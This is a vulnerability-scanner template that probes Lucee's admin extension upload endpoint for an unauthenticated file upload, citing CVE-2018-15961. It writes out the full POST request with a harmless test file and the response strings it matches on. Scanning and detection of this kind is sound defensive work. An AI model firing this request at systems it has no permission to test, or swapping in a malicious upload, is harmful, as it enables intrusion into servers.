id: coldfusion-lucee-unauth-upload
info:
  name: Adobe ColdFusion Lucee Auth Bypass
  risk: High

params:
  - root: "{{.BaseURL}}"

# variables:
#   - ran: RandomString(8)

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/lucee/admin/ext.applications.upload.cfm?sttext.ext.errorFileUpload&stttext.ext.theerror
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYyhIBprztxhZIBEl
    body: |
      ------WebKitFormBoundaryYyhIBprztxhZIBEl
      Content-Disposition: form-data; name="extfile"; filename="sample.lex"

      sample test
      ------WebKitFormBoundaryYyhIBprztxhZIBEl--

    detections:
      - >-
        StringSearch('body', 'exist in the request scope') && StringSearch('body', '-lucee')

references:
  - link: https://github.com/vah13/CVE-2018-15961
